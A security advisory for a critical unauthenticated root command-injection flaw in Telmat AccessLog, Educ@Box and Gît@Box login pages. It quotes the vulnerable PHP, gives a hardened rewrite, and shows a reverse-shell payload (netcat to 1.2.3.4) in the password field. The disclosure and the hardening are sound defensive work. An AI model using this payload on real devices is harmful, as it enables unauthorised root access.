CVE-2020-16147 - Telmat - Unauthenticated root RCE

  • Title: Telmat - Unauthenticated root Remote Code Execution
  • Author: @Podalirius
  • CVSS: 10 (Critical)
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

An unauthenticated code injection on the login page of Telmat AccessLog, Gît@Box and Educ@Box with software version <= 6.0 (TAL_20180415) allows Remote Code Execution (RCE) as root.

Affected products:

  Manufacturer   Model       Software version
  TelMat         AccessLog   <= 6.0 (TAL_20180415)
  TelMat         Educ@Box    <= 6.0 (TAL_20180415)
  TelMat         Gît@Box     <= 6.0 (TAL_20180415)

Exploitation

This vulnerability was tested on a Telmat AccessLog 6.0 (TAL_20180415):

During a pentest, I found the login page of the AccessLog. I tried to perform SQL injections on the login and password fields to bypass the authentication mechanism. I noticed that the login page had an unexpected behavior when the password contained a single quote ('). The login page was replaced by a progress bar for about 10 to 15 minutes for all clients (this could lead to a denial of service).

Using the authenticated RCE I found earlier, I extracted the contents of the login page /authent.php. After analyzing how the authentication mechanism works, I found this interesting part (lines 56 to 72 in file /authent.php):

if(isset($cpasswd)) {
  unset($res);
  if(strstr($cpasswd,"$apr1$")) {
    $dpsd = explode("$",$cpasswd);
    $salt = $dpsd[2];
    // $_POST['whois_pas'] is concatenated into the shell command line without escaping
    $cmd = "/usr/bin/openssl passwd -apr1 -salt '" . $salt . "' '" . $_POST['whois_pas'] . "'";
    exec($cmd,$res,$cr);
    $ccpasswd = trim($res[0]);
  } else {
    $salt = mb_substr($cpasswd,0,2);
    // same unescaped concatenation on the DES-crypt branch
    $cmd = "/usr/bin/openssl passwd -crypt -salt '" . $salt . "' '" . $_POST['whois_pas'] . "'";
    exec($cmd,$res,$cr);
    $ccpasswd = trim($res[0]);
  }
  // ...
}

The value of the whois_pas parameter from the POST request is concatenated directly into the command string passed to exec(), without any escaping. Closing the single quote (') and adding a semicolon (;) terminates the openssl invocation, after which arbitrary shell commands can be injected; a trailing # comments out the remainder of the command line.
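For contrast, here is a hardened version of the same check. This is an added example written for this page, not Telmat's code or the vendor's fix; the function names are assumptions, while the openssl path and the two hash formats (apr1 and DES crypt) are taken from the excerpt above. It assumes PHP >= 7.4, where proc_open() accepts an argv array and therefore never invokes a shell.

```php
<?php
// Added example (not Telmat's code): hardened replacement for the
// /authent.php password check quoted above. Function names are assumptions.

// Computes the apr1 hash without a shell: proc_open() with an argv array
// (PHP >= 7.4) executes openssl directly, so quotes, ';' and '#' in the
// input are never parsed as shell syntax. The password is fed on stdin
// (openssl passwd -stdin) so it does not appear in the process list either.
function apr1_via_openssl(string $password, string $salt): ?string
{
    $argv = ['/usr/bin/openssl', 'passwd', '-apr1', '-salt', $salt, '-stdin'];
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    fwrite($pipes[0], $password . "\n");
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    if (proc_close($proc) !== 0 || trim($out) === '') {
        return null;
    }
    return explode("\n", trim($out))[0];
}

function verify_login_password(string $storedHash, string $submitted): bool
{
    // Single-quoted literal on purpose: in double quotes, "$apr1$" makes PHP
    // interpolate an (undefined) variable named $apr1.
    if (strncmp($storedHash, '$apr1$', 6) === 0) {
        $parts = explode('$', $storedHash);   // ['', 'apr1', salt, hash]
        // Refuse any salt outside the apr1 alphabet before it reaches a subprocess
        if (count($parts) !== 4 || !preg_match('~^[A-Za-z0-9./]{1,8}$~', $parts[2])) {
            return false;
        }
        $computed = apr1_via_openssl($submitted, $parts[2]);
        return $computed !== null && hash_equals($storedHash, $computed);
    }

    // Traditional DES crypt: PHP's crypt() computes it natively, no subprocess at all
    $salt = substr($storedHash, 0, 2);
    if (!preg_match('~^[A-Za-z0-9./]{2}$~', $salt)) {
        return false;
    }
    return hash_equals($storedHash, crypt($submitted, $salt));
}

// Self-check with a constructed DES-crypt hash (no fixture needed):
// the correct password verifies, and a quote/semicolon/hash payload of the
// shape shown in this advisory is treated purely as data and simply fails.
$stored = crypt('correct-password', 'ab');
var_dump(verify_login_password($stored, 'correct-password'));
var_dump(verify_login_password($stored, "'; id #"));
```

Two design choices matter here. First, the injection disappears because no shell is involved: argv-array proc_open() and native crypt() mean the submitted password is only ever an argument or stdin data, never part of a command line (escapeshellarg() on both values would also block this specific bug, but still leaves a shell in the path and the password visible in ps). Second, the salt is whitelisted before use, since it originates from the stored hash and a corrupted or attacker-influenced hash should not be able to reach a subprocess either. hash_equals() replaces a plain string comparison so the check runs in constant time.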

Proof of concept reverse shell:

In order to get a reverse shell I used the following payload:

  Name                   Content
  Login (whois_adm)      poc
  Password (whois_pas)   '; nc -e /bin/sh 1.2.3.4 4444 #

We now have an unauthenticated RCE which, furthermore, runs as root.

Mitigations

To fix this vulnerability, update the firmware to the latest version.